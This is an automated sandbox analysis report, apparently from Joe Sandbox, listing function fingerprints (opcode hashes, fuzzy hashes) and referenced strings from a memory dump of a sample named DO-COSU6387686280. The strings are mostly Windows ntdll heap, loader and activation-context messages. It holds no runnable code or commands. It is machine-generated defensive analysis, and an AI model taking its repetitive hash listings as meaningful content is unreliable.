                                                                                        • Opcode ID: 41ccf24e82fa0beee39b246d923e6e7d783156928936d91acede079c324d45dd
                                                                                        • Instruction ID: e05db955cbaf91eda950603c0a8a050315bf7ece560aa7fecb5c09e223b696f2
                                                                                        • Opcode Fuzzy Hash: 41ccf24e82fa0beee39b246d923e6e7d783156928936d91acede079c324d45dd
                                                                                        • Instruction Fuzzy Hash: 0990023120540802D20471584808686408597D4301F55C021A6024665ED6658A917232
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d73f76dfb5c411158446ac3b59fa250def5af26fffa6715134aa757f3634c4b0
                                                                                        • Instruction ID: 9f77324c903f0851a8cac9d7ec8af16986eca3753e986f606b41b1549eecfaa5
                                                                                        • Opcode Fuzzy Hash: d73f76dfb5c411158446ac3b59fa250def5af26fffa6715134aa757f3634c4b0
                                                                                        • Instruction Fuzzy Hash: D1900225225400020245B558060850B44C5A7DA351395C025F14165A0CC6218A655322
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23657aeaaaefa3a910c833e878ece309efd91b7bb2b86c25b1b92d5c6668aa43
                                                                                        • Instruction ID: 869d000c2d668de7b56b1bee92c559f2ae764500a42d4dc7784f48e4059602cb
                                                                                        • Opcode Fuzzy Hash: 23657aeaaaefa3a910c833e878ece309efd91b7bb2b86c25b1b92d5c6668aa43
                                                                                        • Instruction Fuzzy Hash: 74900225215400030205B558070850740C697D9351355C031F1015560CD6218A615222
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fb5b94d00ad17295ab64fd58bc3bc00172209cb4dd5b39edff6c3c362e9993d
                                                                                        • Instruction ID: 426603ed9973e8ec9342f27f3b16faccf9e21898071f38c4839e0a32d4e42fdd
                                                                                        • Opcode Fuzzy Hash: 3fb5b94d00ad17295ab64fd58bc3bc00172209cb4dd5b39edff6c3c362e9993d
                                                                                        • Instruction Fuzzy Hash: 849002A1205540924600B2588408B0A858597E4201B55C026E1054570CC5258A519236
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b5741c5c590ef2f9a16c81211f9cb41477da08b6c8c8ffc35f143432f55d4ab3
                                                                                        • Instruction ID: fbcffc95a3f433aa82473b2ddd21384da0b6485c402321b8f297c4b539843c4b
                                                                                        • Opcode Fuzzy Hash: b5741c5c590ef2f9a16c81211f9cb41477da08b6c8c8ffc35f143432f55d4ab3
                                                                                        • Instruction Fuzzy Hash: 2F90022130540003D2407158541C6068085E7E5301F55D021E0414564CD9158A565323
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e83f2a880417a1eabe67c82f041705548da21640ffcf3969e4453321dfc8a677
                                                                                        • Instruction ID: 97d6b5659a51c2decc86c58ea537eab2be7381e40e3f35f53e47e3968a05b173
                                                                                        • Opcode Fuzzy Hash: e83f2a880417a1eabe67c82f041705548da21640ffcf3969e4453321dfc8a677
                                                                                        • Instruction Fuzzy Hash: BC90022921740002D2807158540C60A408597D5202F95D425A0015568CC9158A695322
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 706608f870cec20de9b1b6df40b4badd736e10ac857bc94ce1b761ab41c42072
                                                                                        • Instruction ID: d028a28351a46f83ea58a6c7ec49016172f977682551d770a175aeba216136f9
                                                                                        • Opcode Fuzzy Hash: 706608f870cec20de9b1b6df40b4badd736e10ac857bc94ce1b761ab41c42072
                                                                                        • Instruction Fuzzy Hash: 0690022120944442D2007558540CA06408597D4205F55D021A10645A5DC6358A51A232
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1a10a496eb45eef5afb8e2de5a87040d0a78986a90f84604e5ca4acdd614742
                                                                                        • Instruction ID: 67e6e2730929e84ca6a10226d019ee4ddd34cc711b058780539a7d29d1c5c9c5
                                                                                        • Opcode Fuzzy Hash: d1a10a496eb45eef5afb8e2de5a87040d0a78986a90f84604e5ca4acdd614742
                                                                                        • Instruction Fuzzy Hash: DB900221246441525645B15844085078086A7E4241795C022A1414960CC5269A56D722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8db26d0648c61b2fe9456ede3fd4bb2677d1811b3e27451cab5f84a405c95e38
                                                                                        • Instruction ID: 1708fb0e4da644f26a5beac273baa399eaa7b372b4c3d3e4ae261d7d88d3a4d3
                                                                                        • Opcode Fuzzy Hash: 8db26d0648c61b2fe9456ede3fd4bb2677d1811b3e27451cab5f84a405c95e38
                                                                                        • Instruction Fuzzy Hash: 5390022120584442D24072584808B0F818597E5202F95C029A4156564CC9158A555722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                                                                        • Instruction ID: 7b198bd8e7b458dfc82464159d4177059c9417511057ac3f881cc995840d23bb
                                                                                        • Opcode Fuzzy Hash: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                                                                        • Instruction Fuzzy Hash: D390022124540802D240715884187074086D7D4601F55C021A0024564DC6168B6567B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                                                                        • Instruction ID: bf70bc150b8b0e5a58672f0da946d4d94266f4c88b94360583737b231a3d456d
                                                                                        • Opcode Fuzzy Hash: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                                                                        • Instruction Fuzzy Hash: 2290022124945102D250715C44086168085B7E4201F55C031A08145A4DC5558A556322
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                                                                        • Instruction ID: 009cc0530e7b1b6bdb5bca36348f692083311b3074fa65884ccdd8187048ac25
                                                                                        • Opcode Fuzzy Hash: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                                                                        • Instruction Fuzzy Hash: 2D90023520540402D6107158580864640C697D4301F55D421A0424568DC6548AA1A222
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                                                                        • Instruction ID: 5e56b9b4fa441f21852923bb7dbad198a659d6b815cd7cbd22da94c25f33fcd2
                                                                                        • Opcode Fuzzy Hash: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                                                                        • Instruction Fuzzy Hash: 6190023120640142964072585808A4E818597E5302B95D425A0015564CC9148A615322
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: ad845efdc78c852db2baae793369cbdd99d8e48f166cbc3396e1b2cd4a36796c
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                        • Instruction ID: 74fad6ec5455cf71629af8be2d18d19d821f75ede45a8b59d2a52d845f259943
                                                                                        • Opcode Fuzzy Hash: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                        • Instruction Fuzzy Hash: 0F51F9B5A0421ABFDB25DBACCC9097EFBF8BB082407148169F455E7646D374DF4187A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                        • Instruction ID: 7e997d2febe126dace6dbb33cc9d665e1c2cc5b46bd2a691250507c46d86bfa7
                                                                                        • Opcode Fuzzy Hash: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                        • Instruction Fuzzy Hash: 2951F575A08649AFCB20DE9CD89097EFBFAEF48300B048459F496C7641EAB4DB40C7A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: HEAP:
                                                                                        • API String ID: 3446177414-2466845122
                                                                                        • Opcode ID: f9ae441567dbbd7f9a0b813da78b68a594c62e5edcc7e44cd3b1e67556ceb729
                                                                                        • Instruction ID: f129a30db8b252ba79e6c05018623621bbd2512da621b9b915a15aadf70fe784
                                                                                        • Opcode Fuzzy Hash: f9ae441567dbbd7f9a0b813da78b68a594c62e5edcc7e44cd3b1e67556ceb729
                                                                                        • Instruction Fuzzy Hash: 25A1AE75A043118FD719CE1CC894A2ABBE9FF88714F19456DEA46EB311E734EE02CB91
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01804655
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01804787
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01804742
                                                                                        • ExecuteOptions, xrefs: 018046A0
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01804725
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018046FC
                                                                                        • Execute=1, xrefs: 01804713
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 0-484625025
                                                                                        • Opcode ID: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                        • Instruction ID: 14a3957569050ce24abca95974e5778a089ec17e6449d15975882edd4cc000dc
                                                                                        • Opcode Fuzzy Hash: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                        • Instruction Fuzzy Hash: 4D51267160021DAAEF25AAA8DC99BAEF7B8EF14B00F0400EDD605A7181EB709B458F50
                                                                                        Strings
                                                                                        • SsHd, xrefs: 017AA3E4
                                                                                        • Actx , xrefs: 017F7A0C, 017F7A73
                                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 017F79D0, 017F79F5
                                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F79FA
                                                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 017F7AE6
                                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F79D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                        • API String ID: 0-1988757188
                                                                                        • Opcode ID: 3391e532a89dc22a65e288730fe08ace80d2501da8ea7274b38760f7e1d421d0
                                                                                        • Instruction ID: 5c82083c44634a11dbc18f1fe3cab46c2607fd9dbab82ea1eccd3634d84f4fa8
                                                                                        • Opcode Fuzzy Hash: 3391e532a89dc22a65e288730fe08ace80d2501da8ea7274b38760f7e1d421d0
                                                                                        • Instruction Fuzzy Hash: AFE1B0706083028FE729CE2CC894B2BFBE1ABC4354F554B6DFAA58B291D731D945CB52
                                                                                        APIs
                                                                                        Strings
                                                                                        • Actx , xrefs: 017F9508
                                                                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 017F9565
                                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 017F9341, 017F9366
                                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F936B
                                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F9346
                                                                                        • GsHd, xrefs: 017AD874
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                        • API String ID: 3446177414-2196497285
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                        • API String ID: 3446177414-1745908468
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                        • API String ID: 3446177414-4227709934
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                        • API String ID: 3446177414-3492000579
                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpLoadShimEngine, xrefs: 017E9ABB, 017E9AFC
                                                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 017E9AF6
                                                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 017E9AB4
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017E9AC5, 017E9B06
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-3589223738
                                                                                        APIs
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 017BD959
                                                                                          • Part of subcall function 01794859: RtlDebugPrintTimes.NTDLL ref: 017948F7
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-1975516107
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                        • API String ID: 3446177414-3224558752
                                                                                        APIs
                                                                                        Strings
                                                                                        • Entry Heap Size , xrefs: 0183F26D
                                                                                        • HEAP: , xrefs: 0183F15D
                                                                                        • ---------------------------------------, xrefs: 0183F279
                                                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 0183F263
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                        • API String ID: 3446177414-1102453626
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                        • API String ID: 3446177414-1222099010
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-$0$0
                                                                                        • API String ID: 1302938615-699404926
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: $$@
                                                                                        APIs
                                                                                        Strings
                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0180362F
